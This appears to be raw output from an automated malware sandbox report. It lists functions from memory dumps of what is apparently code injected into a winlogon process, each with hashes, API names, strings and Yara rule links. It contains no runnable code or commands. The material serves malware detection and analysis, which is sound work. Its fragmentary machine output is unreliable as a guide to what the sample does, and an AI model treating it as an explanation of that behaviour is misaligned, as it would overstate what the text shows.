                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 71fcdac98b04f8c90e1cb381e77d598407ed309b185261e514eb70d2d2d45b85
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 4F617E3650024243FAE69AA5D5403BD6AA0E7E17E0F644735FD2A937ECDB3C8B41C700
                                                        Function 000001F385B9F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 798ca2d8f1bf394026dd0354072af2df215992b6fdb75384f3c3813a05e348a0
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 40618F3260421242FAEB8A64D4403B9BAA0A7E57F0F604635FD3A137ECEB3CCA418640
                                                        Function 000001F385BCAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 7d0dfc8a691413f4dde3a8332c91cc347d6227e1e938a84b6f8a2983f74cfa34
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: BE616A32600B858AEB51DF65D4403ED77A1F3A4BE8F044225EF9917B98DB38DA95C704
                                                        Function 000001F385BFA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: de6bc9e0d1430427b2a72eb52cbb69da6f06b7e4055c4c057576433a11f966a7
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 98515E36100282CBEBA98B9595443A877A0F3A5BE4F185325FE69C7BDDCB3CD690C700
                                                        Function 000001F385B9A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 634da43ffc88561904e9c766b05514423cef216fd51c5e43a622db91c593a43a
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: BB516132104382CAEBA68B1595443B977A0F3A5BE4F185325FF6947BD9EB3CD691C700
                                                        Function 000001F385BCAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: cdeba406e24003a3a0b1675a6f9d7472096d73f7c1ad2f2c69448a9297637e66
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: F0518F72100682CAEBA58F5594843A977A0F3A5BE5F144335FE6987BD9CB3CDE50C708
                                                        Function 000001F385BF8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: ba53dc36e80807c3e2d48e7356b2653b066ac3483705aa10495dd9823df6bc95
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: C351903271160287DB96CB55E454FA937A5F3A4BE8F508234FE26877CCEB38CA418B44
                                                        Function 000001F385B98405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: e304355abc066f96e17f3cd7cdfa1338fafb4ef0b8800f9706e494f0d0c637c8
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: E2519F326016028BDB96CB25E454BA93795F3A4BE8F508234FE26477CCFB38CA458704
                                                        Function 000001F385BF83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 284da866f2f5732ca223679ce680b25411ae6709bb61a3885cc83e3b25b646bf
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 1631903220164287EB96DF55E844BA93B64F390BE8F058224FE66837CCDB3CCA41CB44
                                                        Function 000001F385B983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 1f122b48d9d6f5b20c7e8e545056d8ecb40dcf6bafc27ce726ad1e6dc5d3d349
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: D131907220164296E796DF11E8447A97764F7A0BE8F158234FE6A477CCEB3CCA40C704
                                                        Function 000001F385BD2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 48194c91b75594280cb710552ccab9c4b6c9696179c88a7cdcdc75127d28105e
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 9ED1AF32714A8189EB52CFA5D4402EC7BB1F7A47E8F148225EE6997BDDDA3CC606C740
                                                        Function 000001F385BC14A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: d3793489244d99d11474eaedf2291eb90a0db23d9d29e5d8d83fa4e484c9e938
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: D701CC32600A92D6EB85DF62E8041AA63A0FBA9FD1F545130FE6903759DE38C610C740
                                                        Function 000001F385BD2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 219b268d2508d01396f34f1c17f2a067e3db346685af521888a3d4dc08d7a7f4
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 1F91D73370069685FF969FA584403FDABA0F7A4BE8F544225EE1A576CCDA7CC542C700
                                                        Function 000001F385BC253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 60e99ca984fe45c8205c3015f8f1e509e2abf101529f829098595df2463e0b0f
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 6D71B13620078286EAA69F6598843FAA694F3E57E4F440236FD6953BCDDA3CCF458704
                                                        Function 000001F385BF9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 768f49f300d8609a6abab68202dda315b1d19df14fbc99aa50587f3a5c2b46f2
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 9E619B33600B858AEB65DFA5E0403ED77A1F394BE8F044226EF6957B98DB38D295C700
                                                        Function 000001F385B99E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 639785ff94cdbec34cdd26092e8e57918619dd365a49ed2093a17fdf676396e3
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 77617C33A00B458AEBA2DF65D4403ED7BA1F394BE8F144225EF6917B98EB38D655C700
                                                        Function 000001F385BC2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 72e056ba0e2456e91081c2497b6582406c8d111315e180d16f48c373d1f09fb1
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 8C51D63220438382EEA69B69A1643FA9651F3E57E0F440235FEA903BCDCA3DCF048744
                                                        Function 000001F385BD26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 7545201565cffb4dd9c12d3e017e1e4cb621b9b8cbb6a5680d551cdf74df0a63
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: F241BF32214A8182DBA28F65E8443F9A7A0F7A87E4F904231EE5D87788EB7CC641C740
                                                        Function 000001F385BC94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 7feea5767932b83702a4603a4908a0b46db3a5e551aabef06720e3f0f0bcf91d
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: DB113036214B4182EB618F15F4403A977E5F798BA4F584225EE9C07798DF3CCA51C704
                                                        Function 000001F385BF7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: cbed634acb7f4e420854ae58bba93560634c5ebebd018ce6374671fac8fe3439
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 95E0807264074591DF014F61D4402E47360D798774B449231AD5C46355F63CD2E9C700
                                                        Function 000001F385B97356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 27eb8d332144c49fc42977003a1dd22787e74c1ec773337d6b22f03e146d9e6f
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 2DE08671641B4990DF038F21E8402E837A1DBA8BB4F589232AD6C0A395FB3CD3E9C701
                                                        Function 000001F385BF73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: e5f91ae01f9c44b97bbe6ed0de8d9856cd4c38cc7e306267f4dcf56f001a539c
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 1AE08672600B4581DF028F61D4402E87360E7A8BB4B889232EE5C46355EA3CD2E9C700
                                                        Function 000001F385B973B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 9cfed72d77cccaa36cf3e22940643e972630171375edc54bb3644584a963761a
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: E6E08671601B4990DF038F21E4401E87761E7A8BA4F989232ED5C0A395FB3CD3E5C300
                                                        Function 000001F385BC1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 61c98598d725439005a8348cc94fee34ff644915bea9077b60c4904ec0b0c66d
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: E1119D35601B4681EE86CF66A4042BA63A0FBD9FE0F584234FE5D577A9DE3CC9428300
                                                        Function 000001F385BC1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: feab5681243c9ea3ef05db4ea452e02591ff6f6f4dae11f5b3763983b80706bc
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: F8E0ED3160160182EB458FA2D8083AA36E0FBE9FA2F84C024DD1807394DF3C8188C750

                                                        Executed Functions

                                                        Function 00007FF752D51140 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.1568565779.00007FF752D51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF752D50000, based on PE: true
                                                        • Associated: 00000024.00000002.1568499666.00007FF752D50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000024.00000002.1568660993.00007FF752D5C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000024.00000002.1568716809.00007FF752D5F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000024.00000002.1569372808.00007FF752FDE000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000024.00000002.1569975980.00007FF753254000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000024.00000002.1570048620.00007FF75328C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_7ff752d50000_eejhedztifcv.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction ID: 700eb59ec7ba3dc87a49091ed17442f2cf39a07078dfd6795f9b3a1cbef0bee8
                                                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction Fuzzy Hash: DBB09231A0530984E2003B15DC4135962606B08741F940030C40C02352CAED9040CB30

                                                        Execution Graph

                                                        Execution Coverage:1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:126
                                                        Total number of Limit Nodes:10
                                                        execution_graph 14651 2a29199253c 14653 2a2919925bb 14651->14653 14652 2a2919927aa 14653->14652 14654 2a29199261d GetFileType 14653->14654 14655 2a29199262b StrCpyW 14654->14655 14656 2a291992641 14654->14656 14657 2a291992650 14655->14657 14667 2a291991a40 GetFinalPathNameByHandleW 14656->14667 14661 2a29199265a 14657->14661 14664 2a2919926ff 14657->14664 14660 2a291993844 StrCmpNIW 14660->14664 14661->14652 14672 2a291993844 14661->14672 14675 2a291993044 StrCmpIW 14661->14675 14679 2a291991cac 14661->14679 14664->14652 14664->14660 14665 2a291993044 4 API calls 14664->14665 14666 2a291991cac 2 API calls 14664->14666 14665->14664 14666->14664 14668 2a291991a6a StrCmpNIW 14667->14668 14669 2a291991aa9 14667->14669 14668->14669 14670 2a291991a84 lstrlenW 14668->14670 14669->14657 14670->14669 14671 2a291991a96 StrCpyW 14670->14671 14671->14669 14673 2a291993851 StrCmpNIW 14672->14673 14674 2a291993866 14672->14674 14673->14674 14674->14661 14676 2a29199308d PathCombineW 14675->14676 14677 2a291993076 StrCpyW StrCatW 14675->14677 14678 2a291993096 14676->14678 14677->14678 14678->14661 14680 2a291991cc3 14679->14680 14681 2a291991ccc 14679->14681 14683 2a29199152c 14680->14683 14681->14661 14684 2a29199157c 14683->14684 14685 2a291991546 14683->14685 14684->14681 14685->14684 14686 2a29199155d StrCmpIW 14685->14686 14687 2a291991565 StrCmpW 14685->14687 14686->14685 14687->14685 14688 2a291991abc 14693 2a291991628 GetProcessHeap HeapAlloc 14688->14693 14690 2a291991ad2 Sleep SleepEx 14691 2a291991acb 14690->14691 14691->14690 14692 2a291991598 StrCmpIW StrCmpW 14691->14692 14692->14691 14744 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14693->14744 14695 2a291991650 14745 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14695->14745 14697 2a291991658 14746 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 